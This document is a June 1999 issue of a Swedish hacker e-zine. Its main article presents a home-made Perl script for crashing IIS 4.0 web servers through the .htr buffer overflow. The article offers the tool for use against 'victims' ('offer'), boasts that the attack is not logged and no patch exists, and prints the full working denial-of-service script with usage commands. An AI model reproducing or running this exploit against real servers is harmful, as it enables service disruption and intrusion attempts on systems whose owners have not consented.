                       _    __            ___
                      | |  / /___ _____  / (_)___ _____ _
                      | | / / __ `/ __ \/ / / __ `/ __ `/
                      | |/ / /_/ / / / / / / /_/ / /_/ /
                      |___/\__,_/_/ /_/_/_/\__, /\__,_/
                                          /____/
             _____ __   _   _ __
            / ___// /__(_)_(_) /__________ _____ ___  ____ ___  ____ _
            \__ \/ //_/ __ \/ __/ ___/ __ `/ __ `__ \/ __ `__ \/ __ `/
           ___/ / ,< / /_/ / /_(__  ) /_/ / / / / / / / / / / / /_/ /
          /____/_/|_|\____/\__/____/\__,_/_/ /_/ /_/_/ /_/ /_/\__,_/

                __  __                __
               / / / /___  ____ _____/ /___  ____ ___  ____ ______
              / / / / __ \/ __ `/ __  / __ \/ __ `__ \/ __ `/ ___/
             / /_/ / / / / /_/ / /_/ / /_/ / / / / / / /_/ / /
             \____/_/ /_/\__, /\__,_/\____/_/ /_/ /_/\__,_/_/
                        /____/

                VANLIGA SKTSAMMA UNGDOMAR NUMMER 9 - JUNI 1999

           "sommaren r kort / det mesta regnar bort"   -- Vergilius


Antal prenumeranter
-=================-

runt 370


Officiell emailadress till VSU-redaktionen
-========================================-

harnhammar@yahoo.com


Ladda ner gamla nummer av VSU
-===========================-

http://welcome.to/Zineworld
http://c5.hakker.com/magazines/
.. och sdr en 11 andra websidor dr ute p Informationsmotorvgen.


Medverkande skribenter i detta nummer
-===================================-

Ulf


------------------------------------------------------------------------------


VSU HTR CRASH v1.0
-================-


Nu kan du bde krascha och ta ver IIS4.0-webservrar som krs under
Windows NT 4.0! Det r den nst vanligaste typen av webservrar p ntet
efter Apache - speciellt mnga stora fretag som r fr uppstyltade och
hmmade fr att vga anvnda Linux och Apache kr IIS!

eEye Digital Security Team (http://www.eeye.com/) postade nyligen ett
inlgg om detta p den skerhetsinriktade mailinglistan Bugtraq.
IIS-webservrarna har en buffer overflow-bug i sin hantering av en speciell
typ av filer vars namn slutar p ".htr". Det enda man behver gra r att
skicka en vanlig GET-request till webservern, fr ett extremt lngt
filnamn som slutar p ".htr". D kan man ta ver webservern (om man kan
koda assembler under Windows NT) eller krascha den.

Fr att gra det hela nnu vrre s (1) loggar inte webservern vem som har
angripit den, och (2) Microsoft har inte ngon patch fr denna bug frdig
nnu.

Detta tyckte ju vi verkade vara roligt, s vi kodade minsann ett eget Perl
5-skript fr att krascha sdana webservrar. Du installerar skriptet genom
att ndra frsta raden s att den pekar p Perl 5-tolken p ditt system,
och sedan ndrar du skriptets accessrttigheter s att det blir krbart.

Du anvnder vrt skript s hr:

./vsu_htr_crash www.0ffer.com
(om webservern svarar p port 80, som de flesta webservrar gr)

eller:
./vsu_htr_crash www.ett-annat-0ffer.nu 8080
(om den istllet svarar p port 8080)

S var det med det! Glm inte bort att kpa Jan Svenssons nya bok "S.H.A.
- Hackergruppen som skakade Sverige" (Kentaur Bokfrlag), som berttar mer
om denna hemlighetsfulla gamla grupp.

Jag har ftt in vldigt dligt med material till VSU#10, s skriv grna
artiklar t VSU och skicka in dem till mig. Hittills har jag tagit med
nstan allt material som folk har skickat in.

Solen skiner. Dags att stnga av datorn och g ut.


// Ulf of VSU



#!/usr/bin/perl --
# VSU HTR Crash v1.0
# (?) Copywrong 1999 Vanliga Sktsamma Ungdomar
# Kodad av Ulf of VSU den 16:e juni 1999
# Buggen funnen av eEye Digital Security Team

use Socket;

# 0.0 INITIALISERING OCH INSTRUKTIONER

print "VSU HTR Crash v1.0\n".
      "(?) Copywrong 1999 Vanliga Sktsamma Ungdomar\n".
      "Kodad av Ulf of VSU den 16:e juni 1999\n".
      "Buggen funnen av eEye Digital Security Team\n\n";

if (($#ARGV < 0) || ($#ARGV > 1) || ($ARGV[0] eq "-h") ||
    ($ARGV[0] eq "--help") || ($ARGV[0] eq "-?"))
{ print "Anvndning:  $0 server [portnr]\n"; exit; }

$| = 1; $crlf = "\015\012";

($machine, $port) = @ARGV; $bugstr = "a" x 3800;
if ($port eq "") { $port = 80; }

$http = "GET /$bugstr.htr HTTP/1.1$crlf".
        "Host: $machine$crlf".
        "User-Agent: Mozilla/4.05 [en] (Win95; I)$crlf".
        "Connection: close$crlf$crlf";

# 1.0 UPPKOPPLING MOT WEBSERVERN

$tcp = getprotobyname("tcp");
socket(SOK, PF_INET, SOCK_STREAM, $tcp) or die "Socketfel!\n";

print "Sker...";
$numb = inet_aton($machine) or die " hittar den inte!\n";

$con = sockaddr_in($port, $numb);

print " ok\nKopplar upp...";
connect(SOK, $con) or die " gr inte mot denna port!\n";

# 2.0 SKICKAR DEN 0NDA HTTP-REQUESTEN

select SOK; $| = 1; select STDOUT; print " ok\nSkickar ddsstten...";
print SOK $http;

# 3.0 VISAR VAD WEBSERVERN EVENTUELLT SKICKAR TILLBAKS

print "\n";
print while <SOK>;
close SOK or die "\nSocketfel!\n";

print "\nKlart!\n";


# VSU 1999 - Stil, Bildning och Moral


